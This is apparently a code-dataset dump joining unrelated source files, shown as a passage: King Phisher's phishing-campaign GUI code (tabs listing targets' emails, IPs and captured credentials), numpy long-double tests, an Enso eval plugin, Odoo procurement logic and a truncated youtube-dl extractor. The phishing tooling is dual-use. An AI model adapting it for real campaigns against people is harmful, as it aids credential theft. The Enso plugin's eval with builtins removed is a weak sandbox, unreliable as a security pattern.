treeview = self.gobjects['treeview_campaign']
pwd_column_id = self.view_columns.index('Password')
treeview.get_column(pwd_column_id).set_property('visible', button.get_property('active'))
class CampaignViewDashboardTab(CampaignViewGenericTab):
"""Display campaign information on a graphical dash board."""
dependencies = gui_utilities.GladeDependencies(
children=(
'box_top_left',
'box_top_right',
'box_bottom',
'scrolledwindow_top_left',
'scrolledwindow_top_right',
'scrolledwindow_bottom'
)
)
label_text = 'Dashboard'
"""The tabs label for display in the GUI."""
def __init__(self, *args, **kwargs):
super(CampaignViewDashboardTab, self).__init__(*args, **kwargs)
self.graphs = []
"""The :py:class:`.CampaignGraph` classes represented on the dash board."""
dash_ports = {
# dashboard position, (width, height)
'top_left': (380, 200),
'top_right': (380, 200),
'bottom': (760, 200)
}
for dash_port, details in dash_ports.items():
graph_name = self.config['dashboard.' + dash_port]
cls = graphs.get_graph(graph_name)
if not cls:
self.logger.warning('could not get graph: ' + graph_name)
logo_file_path = find.data_file('king-phisher-icon.svg')
if logo_file_path:
image = Gtk.Image.new_from_pixbuf(GdkPixbuf.Pixbuf.new_from_file_at_size(logo_file_path, 128, 128))
image.show()
self.gobjects['scrolledwindow_' + dash_port].add(image)
continue
graph_inst = cls(self.application, details, getattr(self, self.top_gobject).get_style_context())
self.gobjects['scrolledwindow_' + dash_port].add(graph_inst.canvas)
self.gobjects['box_' + dash_port].pack_end(graph_inst.navigation_toolbar, False, False, 0)
self.graphs.append(graph_inst)
self.logger.debug("dashboard refresh frequency set to {0} seconds".format(self.refresh_frequency))
GLib.timeout_add_seconds(self.refresh_frequency, self.loader_idle_routine)
def load_campaign_information(self, force=True):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the :py:attr:`~.last_load_time` is compared with
the :py:attr:`~.refresh_frequency` to check if the information is stale.
If the local data is not stale, this function will return without
updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
if not self.application.rpc:
self.logger.warning('skipping load_campaign_information because rpc is not initialized')
return
with self.loader_thread_lock:
self._sync_loader_thread()
self.loader_thread_stop.clear()
self.loader_thread = threading.Thread(target=self.loader_thread_routine)
self.loader_thread.daemon = True
self.loader_thread.start()
def loader_idle_routine(self):
"""The routine which refreshes the campaign data at a regular interval."""
if self.rpc and not self.loader_thread_is_running:
self.logger.debug('idle loader routine called')
self.load_campaign_information()
return True
def loader_thread_routine(self):
"""The loading routine to be executed within a thread."""
if 'campaign_id' not in self.config:
return
if not self.rpc.remote_table_row('campaigns', self.config['campaign_id']):
return
info_cache = {}
for graph in self.graphs:
if self.loader_thread_stop.is_set():
break
if self.is_destroyed.is_set():
break
info_cache.update(gui_utilities.glib_idle_add_wait(lambda g=graph: g.refresh(info_cache, self.loader_thread_stop)))
else:
self.last_load_time = time.time()
class CampaignViewVisitsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding incoming visitors."""
table_name = 'visits'
label_text = 'Visits'
node_query = """\
query getVisit($id: String!) {
db {
node: visit(id: $id) {
id
message { targetEmail }
visitorIp
visitCount
visitorDetails
visitorGeoloc { city }
firstVisit
lastVisit
}
}
}
"""
table_query = """\
query getVisits($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
visits(first: $count, after: $cursor) {
total
edges {
node {
id
message { targetEmail }
visitorIp
visitCount
visitorDetails
visitorGeoloc { city }
firstVisit
lastVisit
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'IP Address',
'Visit Count',
'Visitor User Agent',
'Visitor Location',
'First Visit',
'Last Visit'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(30, 30, 25, 15, 90, 30, 25, 25),
title=label_text
)
def format_node_data(self, node):
geo_location = UNKNOWN_LOCATION_STRING
visitor_ip = node['visitorIp']
if visitor_ip is None:
visitor_ip = ''
else:
visitor_ip = ipaddress.ip_address(visitor_ip)
if visitor_ip.is_loopback:
geo_location = 'N/A (Loopback)'
elif visitor_ip.is_private:
geo_location = 'N/A (Private)'
elif isinstance(visitor_ip, ipaddress.IPv6Address):
geo_location = 'N/A (IPv6 Address)'
elif node['visitorGeoloc']:
geo_location = node['visitorGeoloc']['city']
row = (
node['message']['targetEmail'],
str(visitor_ip),
node['visitCount'],
node['visitorDetails'],
geo_location,
node['firstVisit'],
node['lastVisit']
)
return row
class CampaignViewMessagesTab(CampaignViewGenericTableTab):
"""Display campaign information regarding sent messages."""
table_name = 'messages'
label_text = 'Messages'
node_query = """\
query getMessage($id: String!) {
db {
node: message(id: $id) {
id
targetEmail
sent
trained
companyDepartment { name }
opened
openerIp
openerUserAgent
}
}
}
"""
table_query = """\
query getMessages($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
messages(first: $count, after: $cursor) {
total
edges {
node {
id
targetEmail
sent
trained
companyDepartment { name }
opened
openerIp
openerUserAgent
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'Sent',
'Trained',
'Department',
'Opened',
'Opener IP Address',
'Opener User Agent'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(30, 30, 30, 15, 20, 20, 25, 90),
title=label_text
)
def format_node_data(self, node):
department = node['companyDepartment']
if department:
department = department['name']
row = (
node['targetEmail'],
node['sent'],
('Yes' if node['trained'] else ''),
department,
node['opened'],
node['openerIp'],
node['openerUserAgent']
)
return row
class CampaignViewTab(object):
"""
The King Phisher client top-level 'View Campaign' tab. This object
manages the sub-tabs which display all the information regarding
the current campaign.
"""
def __init__(self, parent, application):
"""
:param parent: The parent window for this object.
:type parent: :py:class:`Gtk.Window`
:param application: The main client application instance.
:type application: :py:class:`Gtk.Application`
"""
self.parent = parent
self.application = application
self.config = application.config
self.logger = logging.getLogger('KingPhisher.Client.' + self.__class__.__name__)
self.box = Gtk.Box()
self.box.set_property('orientation', Gtk.Orientation.VERTICAL)
self.box.show()
self.label = Gtk.Label(label='View Campaign')
"""The :py:class:`Gtk.Label` representing this tabs name."""
self.notebook = Gtk.Notebook()
""" The :py:class:`Gtk.Notebook` for holding sub-tabs."""
self.notebook.connect('switch-page', self.signal_notebook_switch_page)
self.notebook.set_scrollable(True)
self.box.pack_start(self.notebook, True, True, 0)
self.tabs = utilities.FreezableDict()
"""A dict object holding the sub tabs managed by this object."""
current_page = self.notebook.get_current_page()
self.last_page_id = current_page
if graphs.has_matplotlib:
self.logger.info('matplotlib is installed, dashboard will be available')
dashboard_tab = CampaignViewDashboardTab(application)
self.tabs['dashboard'] = dashboard_tab
self.notebook.append_page(dashboard_tab.box, dashboard_tab.label)
else:
self.logger.warning('matplotlib is not installed, dashboard will not be available')
messages_tab = CampaignViewMessagesTab(application)
self.tabs['messages'] = messages_tab
self.notebook.append_page(messages_tab.box, messages_tab.label)
visits_tab = CampaignViewVisitsTab(application)
self.tabs['visits'] = visits_tab
self.notebook.append_page(visits_tab.box, visits_tab.label)
credentials_tab = CampaignViewCredentialsTab(application)
self.tabs['credentials'] = credentials_tab
self.notebook.append_page(credentials_tab.box, credentials_tab.label)
if self.config.get('gui.show_deaddrop', False):
deaddrop_connections_tab = CampaignViewDeaddropTab(application)
self.tabs['deaddrop_connections'] = deaddrop_connections_tab
self.notebook.append_page(deaddrop_connections_tab.box, deaddrop_connections_tab.label)
self.tabs.freeze()
for tab in self.tabs.values():
tab.box.show()
self.notebook.show()
def signal_notebook_switch_page(self, notebook, current_page, index):
if not hasattr(self.parent, 'rpc'):
return
#previous_page = notebook.get_nth_page(self.last_page_id)
self.last_page_id = index
for tab in self.tabs.values():
if current_page != tab.box:
continue
if hasattr(tab, 'load_campaign_information'):
tab.load_campaign_information(force=False)
|
bsd-3-clause
|
JFriel/honours_project
|
venv/lib/python2.7/site-packages/numpy/core/tests/test_longdouble.py
|
65
|
5845
|
from __future__ import division, absolute_import, print_function
import locale
import numpy as np
from numpy.testing import (
run_module_suite, assert_, assert_equal, dec, assert_raises,
assert_array_equal, TestCase, temppath,
)
from numpy.compat import sixu
from test_print import in_foreign_locale
longdouble_longer_than_double = (np.finfo(np.longdouble).eps
< np.finfo(np.double).eps)
_o = 1 + np.finfo(np.longdouble).eps
string_to_longdouble_inaccurate = (_o != np.longdouble(repr(_o)))
del _o
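# On typical x86-64 glibc builds long double is 80-bit extended precision,
# so np.finfo(np.longdouble).eps (2**-63, ~1.08e-19) is below
# np.finfo(np.double).eps (2**-52, ~2.22e-16) and
# longdouble_longer_than_double is True; where long double aliases double
# it is False.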
def test_scalar_extraction():
"""Confirm that extracting a value doesn't convert to python float"""
o = 1 + np.finfo(np.longdouble).eps
a = np.array([o, o, o])
assert_equal(a[1], o)
# Conversions string -> long double
def test_repr_roundtrip():
o = 1 + np.finfo(np.longdouble).eps
assert_equal(np.longdouble(repr(o)), o,
"repr was %s" % repr(o))
def test_unicode():
np.longdouble(sixu("1.2"))
def test_string():
np.longdouble("1.2")
def test_bytes():
np.longdouble(b"1.2")
@in_foreign_locale
def test_fromstring_foreign():
f = 1.234
a = np.fromstring(repr(f), dtype=float, sep=" ")
assert_equal(a[0], f)
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_repr_roundtrip_bytes():
o = 1 + np.finfo(np.longdouble).eps
assert_equal(np.longdouble(repr(o).encode("ascii")), o)
@in_foreign_locale
def test_repr_roundtrip_foreign():
o = 1.5
assert_equal(o, np.longdouble(repr(o)))
def test_bogus_string():
assert_raises(ValueError, np.longdouble, "spam")
assert_raises(ValueError, np.longdouble, "1.0 flub")
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_fromstring():
o = 1 + np.finfo(np.longdouble).eps
s = (" " + repr(o))*5
a = np.array([o]*5)
assert_equal(np.fromstring(s, sep=" ", dtype=np.longdouble), a,
err_msg="reading '%s'" % s)
@in_foreign_locale
def test_fromstring_best_effort_float():
assert_equal(np.fromstring("1,234", dtype=float, sep=" "),
np.array([1.]))
@in_foreign_locale
def test_fromstring_best_effort():
assert_equal(np.fromstring("1,234", dtype=np.longdouble, sep=" "),
np.array([1.]))
def test_fromstring_bogus():
assert_equal(np.fromstring("1. 2. 3. flop 4.", dtype=float, sep=" "),
np.array([1., 2., 3.]))
def test_fromstring_empty():
assert_equal(np.fromstring("xxxxx", sep="x"),
np.array([]))
def test_fromstring_missing():
assert_equal(np.fromstring("1xx3x4x5x6", sep="x"),
np.array([1]))
class FileBased(TestCase):
ldbl = 1 + np.finfo(np.longdouble).eps
tgt = np.array([ldbl]*5)
out = ''.join([repr(t) + '\n' for t in tgt])
def test_fromfile_bogus(self):
with temppath() as path:
with open(path, 'wt') as f:
f.write("1. 2. 3. flop 4.\n")
res = np.fromfile(path, dtype=float, sep=" ")
assert_equal(res, np.array([1., 2., 3.]))
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_fromfile(self):
with temppath() as path:
with open(path, 'wt') as f:
f.write(self.out)
res = np.fromfile(path, dtype=np.longdouble, sep="\n")
assert_equal(res, self.tgt)
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_genfromtxt(self):
with temppath() as path:
with open(path, 'wt') as f:
f.write(self.out)
res = np.genfromtxt(path, dtype=np.longdouble)
assert_equal(res, self.tgt)
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_loadtxt(self):
with temppath() as path:
with open(path, 'wt') as f:
f.write(self.out)
res = np.loadtxt(path, dtype=np.longdouble)
assert_equal(res, self.tgt)
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_tofile_roundtrip(self):
with temppath() as path:
self.tgt.tofile(path, sep=" ")
res = np.fromfile(path, dtype=np.longdouble, sep=" ")
assert_equal(res, self.tgt)
@in_foreign_locale
def test_fromstring_foreign_longdouble():
s = "1.234"
a = np.fromstring(s, dtype=np.longdouble, sep=" ")
assert_equal(a[0], np.longdouble(s))
@in_foreign_locale
def test_fromstring_foreign_sep():
a = np.array([1, 2, 3, 4])
b = np.fromstring("1,2,3,4,", dtype=np.longdouble, sep=",")
assert_array_equal(a, b)
@in_foreign_locale
def test_fromstring_foreign_value():
b = np.fromstring("1,234", dtype=np.longdouble, sep=" ")
assert_array_equal(b[0], 1)
# Conversions long double -> string
def test_repr_exact():
o = 1 + np.finfo(np.longdouble).eps
assert_(repr(o) != '1')
@dec.knownfailureif(longdouble_longer_than_double, "BUG #2376")
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_format():
o = 1 + np.finfo(np.longdouble).eps
assert_("{0:.40g}".format(o) != '1')
@dec.knownfailureif(longdouble_longer_than_double, "BUG #2376")
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_percent():
o = 1 + np.finfo(np.longdouble).eps
assert_("%.40g" % o != '1')
@dec.knownfailureif(longdouble_longer_than_double, "array repr problem")
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_array_repr():
o = 1 + np.finfo(np.longdouble).eps
a = np.array([o])
b = np.array([1], dtype=np.longdouble)
if not np.all(a != b):
raise ValueError("precision loss creating arrays")
assert_(repr(a) != repr(b))
if __name__ == "__main__":
run_module_suite()
|
gpl-3.0
|
pf/enso
|
enso/contrib/evaluate.py
|
8
|
5500
|
# Copyright (c) 2008, Humanized, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of Enso nor the names of its contributors may
# be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Humanized, Inc. ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Humanized, Inc. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
#
# enso.contrib.evaluate
#
# ----------------------------------------------------------------------------
"""
An Enso plugin that makes the 'evaluate' command available.
"""
# ----------------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------------
from enso.commands import CommandManager, CommandObject
from enso.utils import xml_tools
# ----------------------------------------------------------------------------
# The Evaluate command
# ---------------------------------------------------------------------------
class EvalCommand( CommandObject ):
"""
The 'evaluate' command.
"""
NAME = "evaluate"
DESCRIPTION = "Evaluates the current selection as Python code."
def __init__( self, displayMessage=None, selection=None ):
super( EvalCommand, self ).__init__()
self.setDescription( self.DESCRIPTION )
self.setName( self.NAME )
if displayMessage is None:
from enso import messages
displayMessage = messages.displayMessage
if selection is None:
import enso.selection
selection = enso.selection
self._selection = selection
self._displayMessage = displayMessage
def run( self, seldict=None ):
if seldict is None:
seldict = self._selection.get()
text = seldict.get( "text", u"" ).strip()
evalSuccessful = False
append = False
if text.endswith( "=" ):
text = text[:-1].strip()
append = True
if not text:
self._displayMessage( "<p>No code to evaluate!</p>" )
else:
try:
code = compile( text, "<selected text>", "eval" )
result = eval( code, {"__builtins__":None}, {} )
evalSuccessful = True
except Exception, e:
self._displayMessage(
"<p>Error: %s</p>" % xml_tools.escape_xml(str(e))
)
if evalSuccessful:
resulttext = unicode( repr(result) )
if append:
newtext = "%s = %s" % (text, resulttext)
else:
newtext = resulttext
self._selection.set( {"text" : newtext} )
# ----------------------------------------------------------------------------
# Plugin initialization
# ---------------------------------------------------------------------------
def load():
CommandManager.get().registerCommand(
EvalCommand.NAME,
EvalCommand()
)
# ----------------------------------------------------------------------------
# Doctests
# ---------------------------------------------------------------------------
def test_evaluate():
"""
Set up mock objects:
>>> def mockDisplayMessage( text ):
... print "message: %s" % text
>>> class MockSelection( object ):
... def set( self, seldict ):
... print "set selection: %s" % seldict
Initialize our command with the mock objects:
>>> ec = EvalCommand( mockDisplayMessage, MockSelection() )
Ensure that the command works if nothing is selected:
>>> ec.run( {} )
message: <p>No code to evaluate!</p>
Ensure that the command works in the general case:
>>> ec.run( {'text' : u'5+3'} )
set selection: {'text': u'8'}
Ensure that the command works with syntax errors:
>>> ec.run( {'text' : u'5+'} )
message: <p>Error: unexpected EOF while parsing (<selected text>, line 1)</p>
Ensure that the command doesn't allow standard Python builtins to be used:
>>> ec.run( {'text' : u'open("secretfile", "w")'} )
message: <p>Error: name 'open' is not defined</p>
"""
pass
if __name__ == "__main__":
import doctest
doctest.testmod()
|
bsd-3-clause
|
CopeX/odoo
|
addons/procurement/procurement.py
|
151
|
15839
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from psycopg2 import OperationalError
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
import openerp.addons.decimal_precision as dp
from openerp.tools.translate import _
import openerp
PROCUREMENT_PRIORITIES = [('0', 'Not urgent'), ('1', 'Normal'), ('2', 'Urgent'), ('3', 'Very Urgent')]
class procurement_group(osv.osv):
'''
The procurement group class is used to group products together
when computing procurements (tasks, physical products, ...).
The goal is that when you have one sale order with several products,
and the products are pulled from one or several locations, the moves
stay grouped into pickings that represent the sale order.
Used in: sale orders (to group delivery order lines like the SO), pull/push
rules (to pack like the delivery order), on orderpoints (e.g. for wave picking
all the similar products together).
Grouping is done only if the source and the destination are the same.
Suppose you have 4 lines on a picking from Output, where 2 lines need
to come from Input (crossdock) and 2 lines come from Stock -> Output. As
the four procurement orders will have the same group id from the SO, the
move from Input will have a stock.picking with 2 grouped lines and the move
from Stock will have 2 grouped lines as well.
The name is usually the name of the original document (sale order) or a
sequence computed if created manually.
'''
_name = 'procurement.group'
_description = 'Procurement Requisition'
_order = "id desc"
_columns = {
'name': fields.char('Reference', required=True),
'move_type': fields.selection([
('direct', 'Partial'), ('one', 'All at once')],
'Delivery Method', required=True),
'procurement_ids': fields.one2many('procurement.order', 'group_id', 'Procurements'),
}
_defaults = {
'name': lambda self, cr, uid, c: self.pool.get('ir.sequence').get(cr, uid, 'procurement.group') or '',
'move_type': lambda self, cr, uid, c: 'direct'
}
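# Usage sketch (hypothetical, old-style OpenERP API): a group is normally
# created implicitly from a sale order, but an equivalent manual creation
# would look like
#   group_id = self.pool.get('procurement.group').create(
#       cr, uid, {'move_type': 'one'}, context=context)
# The 'name' default then draws the next 'procurement.group' sequence value.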
class procurement_rule(osv.osv):
'''
A rule describes what a procurement should do: produce, buy, move, ...
'''
_name = 'procurement.rule'
_description = "Procurement Rule"
_order = "name"
def _get_action(self, cr, uid, context=None):
return []
_columns = {
'name': fields.char('Name', required=True, translate=True,
help="This field will fill the packing origin and the name of its moves"),
'active': fields.boolean('Active', help="If unchecked, it will allow you to hide the rule without removing it."),
'group_propagation_option': fields.selection([('none', 'Leave Empty'), ('propagate', 'Propagate'), ('fixed', 'Fixed')], string="Propagation of Procurement Group"),
'group_id': fields.many2one('procurement.group', 'Fixed Procurement Group'),
'action': fields.selection(selection=lambda s, cr, uid, context=None: s._get_action(cr, uid, context=context),
string='Action', required=True),
'sequence': fields.integer('Sequence'),
'company_id': fields.many2one('res.company', 'Company'),
}
_defaults = {
'group_propagation_option': 'propagate',
'sequence': 20,
'active': True,
}
class procurement_order(osv.osv):
"""
Procurement Orders
"""
_name = "procurement.order"
_description = "Procurement"
_order = 'priority desc, date_planned, id asc'
_inherit = ['mail.thread']
_log_create = False
_columns = {
'name': fields.text('Description', required=True),
'origin': fields.char('Source Document',
help="Reference of the document that created this Procurement.\n"
"This is automatically completed by Odoo."),
'company_id': fields.many2one('res.company', 'Company', required=True),
# These two fields are used for scheduling
'priority': fields.selection(PROCUREMENT_PRIORITIES, 'Priority', required=True, select=True, track_visibility='onchange'),
'date_planned': fields.datetime('Scheduled Date', required=True, select=True, track_visibility='onchange'),
'group_id': fields.many2one('procurement.group', 'Procurement Group'),
'rule_id': fields.many2one('procurement.rule', 'Rule', track_visibility='onchange', help="Chosen rule for the procurement resolution. Usually chosen by the system but can be manually set by the procurement manager to force an unusual behavior."),
'product_id': fields.many2one('product.product', 'Product', required=True, states={'confirmed': [('readonly', False)]}, readonly=True),
'product_qty': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure'), required=True, states={'confirmed': [('readonly', False)]}, readonly=True),
'product_uom': fields.many2one('product.uom', 'Product Unit of Measure', required=True, states={'confirmed': [('readonly', False)]}, readonly=True),
'product_uos_qty': fields.float('UoS Quantity', states={'confirmed': [('readonly', False)]}, readonly=True),
'product_uos': fields.many2one('product.uom', 'Product UoS', states={'confirmed': [('readonly', False)]}, readonly=True),
'state': fields.selection([
('cancel', 'Cancelled'),
('confirmed', 'Confirmed'),
('exception', 'Exception'),
('running', 'Running'),
('done', 'Done')
], 'Status', required=True, track_visibility='onchange', copy=False),
}
_defaults = {
'state': 'confirmed',
'priority': '1',
'date_planned': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'procurement.order', context=c)
}
def unlink(self, cr, uid, ids, context=None):
procurements = self.read(cr, uid, ids, ['state'], context=context)
unlink_ids = []
for s in procurements:
if s['state'] == 'cancel':
unlink_ids.append(s['id'])
else:
raise osv.except_osv(_('Invalid Action!'),
_('Cannot delete Procurement Order(s) which are in %s state.') % s['state'])
return osv.osv.unlink(self, cr, uid, unlink_ids, context=context)
def do_view_procurements(self, cr, uid, ids, context=None):
'''
This function returns an action that displays the existing procurement orders
of the same procurement group as the given ids.
'''
act_obj = self.pool.get('ir.actions.act_window')
action_id = self.pool.get('ir.model.data').xmlid_to_res_id(cr, uid, 'procurement.do_view_procurements', raise_if_not_found=True)
result = act_obj.read(cr, uid, [action_id], context=context)[0]
group_ids = set([proc.group_id.id for proc in self.browse(cr, uid, ids, context=context) if proc.group_id])
result['domain'] = "[('group_id','in',[" + ','.join(map(str, list(group_ids))) + "])]"
return result
def onchange_product_id(self, cr, uid, ids, product_id, context=None):
""" Finds UoM and UoS of changed product.
@param product_id: Changed id of product.
@return: Dictionary of values.
"""
if product_id:
w = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
v = {
'product_uom': w.uom_id.id,
'product_uos': w.uos_id and w.uos_id.id or w.uom_id.id
}
return {'value': v}
return {}
def get_cancel_ids(self, cr, uid, ids, context=None):
return [proc.id for proc in self.browse(cr, uid, ids, context=context) if proc.state != 'done']
def cancel(self, cr, uid, ids, context=None):
#cancel only the procurements that aren't done already
to_cancel_ids = self.get_cancel_ids(cr, uid, ids, context=context)
if to_cancel_ids:
return self.write(cr, uid, to_cancel_ids, {'state': 'cancel'}, context=context)
def reset_to_confirmed(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'confirmed'}, context=context)
def run(self, cr, uid, ids, autocommit=False, context=None):
for procurement_id in ids:
#we intentionally do the browse inside the for loop to avoid caching all ids, which would be resource greedy
#and useless as we'll do a refresh later that will invalidate all the cache (and thus the next iteration
#would fetch all the ids again)
procurement = self.browse(cr, uid, procurement_id, context=context)
if procurement.state not in ("running", "done"):
try:
if self._assign(cr, uid, procurement, context=context):
res = self._run(cr, uid, procurement, context=context or {})
if res:
self.write(cr, uid, [procurement.id], {'state': 'running'}, context=context)
else:
self.write(cr, uid, [procurement.id], {'state': 'exception'}, context=context)
else:
self.message_post(cr, uid, [procurement.id], body=_('No rule matching this procurement'), context=context)
self.write(cr, uid, [procurement.id], {'state': 'exception'}, context=context)
if autocommit:
cr.commit()
except OperationalError:
if autocommit:
cr.rollback()
continue
else:
raise
return True
def check(self, cr, uid, ids, autocommit=False, context=None):
done_ids = []
for procurement in self.browse(cr, uid, ids, context=context):
try:
result = self._check(cr, uid, procurement, context=context)
if result:
done_ids.append(procurement.id)
if autocommit:
cr.commit()
except OperationalError:
if autocommit:
cr.rollback()
continue
else:
raise
if done_ids:
self.write(cr, uid, done_ids, {'state': 'done'}, context=context)
return done_ids
#
# Method to overwrite in different procurement modules
#
def _find_suitable_rule(self, cr, uid, procurement, context=None):
'''This method returns a procurement.rule that describes what to do with the given procurement
in order to complete its needs. It returns False if no suitable rule is found.
:param procurement: browse record
:rtype: int or False
'''
return False
def _assign(self, cr, uid, procurement, context=None):
'''This method checks what to do with the given procurement in order to complete its needs.
It returns False if no solution is found, otherwise it stores the matching rule (if any) and
returns True.
:param procurement: browse record
:rtype: boolean
'''
#if the procurement already has a rule assigned, we keep it (it has a higher priority as it may have been chosen manually)
if procurement.rule_id:
return True
elif procurement.product_id.type != 'service':
rule_id = self._find_suitable_rule(cr, uid, procurement, context=context)
if rule_id:
self.write(cr, uid, [procurement.id], {'rule_id': rule_id}, context=context)
return True
return False
def _run(self, cr, uid, procurement, context=None):
'''This method implements the resolution of the given procurement
:param procurement: browse record
:returns: True if the resolution of the procurement was a success, False otherwise to set it in exception
'''
return True
def _check(self, cr, uid, procurement, context=None):
'''Returns True if the given procurement is fulfilled, False otherwise
:param procurement: browse record
:rtype: boolean
'''
return False
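# Override sketch (hypothetical downstream module): concrete procurement
# modules implement the stubs above, e.g.
#   def _run(self, cr, uid, procurement, context=None):
#       if procurement.rule_id.action == 'move':
#           # ...create the stock move here...
#           return True
#       return super(procurement_order, self)._run(cr, uid, procurement,
#                                                  context=context)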
#
# Scheduler
#
def run_scheduler(self, cr, uid, use_new_cursor=False, company_id=False, context=None):
'''
Call the scheduler to check the procurement orders. This is intended to be done for all existing companies at
the same time, so we're running all the methods as SUPERUSER to avoid intercompany and access rights issues.
@param self: The object pointer
@param cr: The current row, from the database cursor,
@param uid: The current user ID for security checks
@param use_new_cursor: if set, use a dedicated cursor and auto-commit after processing each procurement.
This is appropriate for batch jobs only.
@param context: A standard dictionary for contextual values
@return: Dictionary of values
'''
if context is None:
context = {}
try:
if use_new_cursor:
cr = openerp.registry(cr.dbname).cursor()
# Run confirmed procurements
dom = [('state', '=', 'confirmed')]
if company_id:
dom += [('company_id', '=', company_id)]
prev_ids = []
while True:
ids = self.search(cr, SUPERUSER_ID, dom, context=context)
if not ids or prev_ids == ids:
break
else:
prev_ids = ids
self.run(cr, SUPERUSER_ID, ids, autocommit=use_new_cursor, context=context)
if use_new_cursor:
cr.commit()
# Check if running procurements are done
offset = 0
dom = [('state', '=', 'running')]
if company_id:
dom += [('company_id', '=', company_id)]
prev_ids = []
while True:
ids = self.search(cr, SUPERUSER_ID, dom, offset=offset, context=context)
if not ids or prev_ids == ids:
break
else:
prev_ids = ids
self.check(cr, SUPERUSER_ID, ids, autocommit=use_new_cursor, context=context)
if use_new_cursor:
cr.commit()
finally:
if use_new_cursor:
try:
cr.close()
except Exception:
pass
return {}
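# Invocation sketch: in production this method is triggered from an ir.cron
# record; an equivalent manual call (context assumed) would be
#   self.pool.get('procurement.order').run_scheduler(
#       cr, uid, use_new_cursor=True, context=context)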
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
noba3/KoTos
|
addons/script.module.youtube.dl/lib/youtube_dl/extractor/sunporno.py
|
127
|
2384
|
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
parse_duration,
int_or_none,
qualities,
determine_ext,
)
class SunPornoIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?sunporno\.com/videos/(?P<id>\d+)'
_TEST = {
'url': 'http://www.sunporno.com/videos/807778/',
'md5': '6457d3c165fd6de062b99ef6c2ff4c86',
'info_dict': {
'id': '807778',
'ext': 'flv',
'title': 'md5:0a400058e8105d39e35c35e7c5184164',
'description': 'md5:a31241990e1bd3a64e72ae99afb325fb',
'thumbnail': 're:^https?://.*\.jpg$',
'duration': 302,
'age_limit': 18,
}
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
title = self._html_search_regex(
r'<title>([^<]+)</title>', webpage, 'title')
description = self._html_search_meta(
'description', webpage, 'description')
thumbnail = self._html_search_regex(
r'poster="([^"]+)"', webpage, 'thumbnail', fatal=False)
duration = parse_duration(self._search_regex(
r'itemprop="duration">\s*(\d+:\d+)\s*<',
webpage, 'duration', fatal=False))
view_count = int_or_none(self._html_search_regex(
r'class="views">(?:<noscript>)?\s*(\d+)\s*<',
webpage, 'view count', fatal=False))
comment_count = int_or_none(self._html_search_regex(
r'(\d+)</b> Comments?',
webpage, 'comment count', fatal=False))
formats = []
quality = qualities(['mp4', 'flv'])
